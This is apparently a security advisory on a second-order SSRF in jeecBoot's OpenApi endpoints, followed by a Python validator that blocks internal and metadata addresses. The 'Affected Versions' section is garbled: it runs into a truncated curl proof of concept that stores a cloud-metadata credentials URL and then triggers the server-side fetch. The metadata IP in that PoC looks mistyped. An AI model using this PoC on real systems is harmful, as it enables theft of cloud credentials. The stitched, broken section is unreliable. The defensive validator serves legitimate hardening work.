# [Security] Second-Order SSRF via OpenApi Service in jeecboot_jeecBoot #9554

## Vulnerability Overview

This is a **Second-Order Server-Side Request Forgery (Second-Order SSRF)** vulnerability in the OpenApi service of `jeecboot_jeecBoot`. The root cause is that the `/openapi/add` endpoint lacks proper authorization (missing `@RequiresPermissions`) and input validation, allowing authenticated users to store arbitrary internal or cloud-metadata URLs in the `originUrl` field. When the `/openapi/call/{path}` endpoint is later invoked, the application retrieves this stored URL and issues an outbound HTTP request to it, enabling attackers to bypass network segmentation, scan internal services, or steal cloud credentials.

## Impact Scope

* **Affected Versions**:

```bash
' \
  -d '{
    "name": "AWS Metadata",
    "requestMethod": "GET",
    "requestUrl": "aws-meta",
    "originUrl": "http://100.254.169.254/latest/meta-data/iam/security-credentials/",
    "status": 1
  }'

# 2. Trigger SSRF
curl -X GET "http://target:8080/openapi/call/aws-meta" \
  -H 'X-Access-Token: '
```
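The overview attributes the issue to two missing controls on `/openapi/add`: authorization and validation of `originUrl`. The authorization half is an annotation on the Java controller; the validation half is shown below as an added Python example that is not code from the project. It is the destination check a defender would run when an `originUrl` is stored and again immediately before `/openapi/call/{path}` makes the outbound request, because in a second-order SSRF the stored value, or the DNS record behind it, can change between those two moments. The function names, the blocked-range list and the `DEMO_DNS` resolver table are assumptions constructed for the example; the real deployment would use `system_resolver` and should connect to the vetted address rather than re-resolving the name.

```python
from __future__ import annotations

import ipaddress
import socket
from typing import Callable, Iterable, Union
from urllib.parse import urlsplit

# Ranges an outbound request to a stored originUrl must never reach: "this host",
# RFC 1918, carrier-grade NAT, loopback, link-local (which contains the
# 169.254.169.254 cloud metadata address), multicast/reserved, and the IPv6
# unspecified, loopback, unique-local, link-local and multicast ranges.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "240.0.0.0/4",
    "::/128", "::1/128", "fc00::/7", "fe80::/10", "ff00::/8",
)]

Resolver = Callable[[str], Iterable[str]]
IPAddress = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]


def system_resolver(host: str) -> list[str]:
    """Resolve a hostname to every address it currently maps to (A and AAAA)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_blocked_address(addr: IPAddress) -> bool:
    """True if addr is in a blocked range; IPv4-mapped IPv6 is judged as its IPv4."""
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped  # ::ffff:10.0.0.1 must be treated as 10.0.0.1
    return any(addr in net for net in BLOCKED_NETWORKS)


def validate_origin_url(url: str, resolver: Resolver = system_resolver) -> tuple[bool, str]:
    """Decide whether a user-supplied originUrl may be fetched server-side.

    Returns (allowed, reason). Every address the host resolves to must be
    acceptable, so a name with one public and one private record is rejected
    instead of being left to whichever record the HTTP client happens to pick.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme not allowed: {parts.scheme!r}"
    host = parts.hostname  # lowercased; brackets already stripped from IPv6 literals
    if not host:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials embedded in URL are not allowed"
    try:
        addrs: list[IPAddress] = [ipaddress.ip_address(host)]  # IP literal, no DNS
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolver(host)]
        except (socket.gaierror, ValueError) as exc:
            return False, f"could not resolve {host!r}: {exc}"
        if not addrs:
            return False, f"{host!r} resolved to no addresses"
    for addr in addrs:
        if is_blocked_address(addr):
            return False, f"{host!r} resolves to blocked address {addr}"
    return True, "ok"


# Constructed resolver table so the example runs offline (not real DNS data).
DEMO_DNS = {
    "api.partner.example": ["203.0.113.10"],
    "localhost": ["127.0.0.1", "::1"],
    "rebind.example": ["203.0.113.10", "10.0.0.5"],  # one public, one private record
}


def demo_resolver(host: str) -> list[str]:
    """Stand-in for system_resolver backed by the constructed DEMO_DNS table."""
    try:
        return DEMO_DNS[host]
    except KeyError:
        raise socket.gaierror(f"no DEMO_DNS entry for {host!r}")


if __name__ == "__main__":
    # Constructed sample originUrl values; only the first should be accepted.
    samples = [
        "https://api.partner.example/v1/orders",
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
        "http://localhost:8080/admin/",
        "http://[::ffff:10.0.0.1]/",
        "http://rebind.example/",
        "file:///etc/passwd",
        "http://user:pw@api.partner.example/",
    ]
    for url in samples:
        allowed, reason = validate_origin_url(url, demo_resolver)
        print(f"{'ALLOW' if allowed else 'REJECT':6} {url}  ({reason})")
```

Running the check only in `/openapi/add` is not enough for a stored URL: the same function must run in `/openapi/call/{path}` right before the request, and the HTTP client should be pointed at the address that passed the check (with the original hostname in the `Host` header and TLS SNI) so a DNS answer that changes between validation and connection cannot redirect the request inward. An allowlist of approved origin hosts, where the deployment can maintain one, is stricter than this range denylist and is preferable for an endpoint that only ever proxies a few known partner APIs.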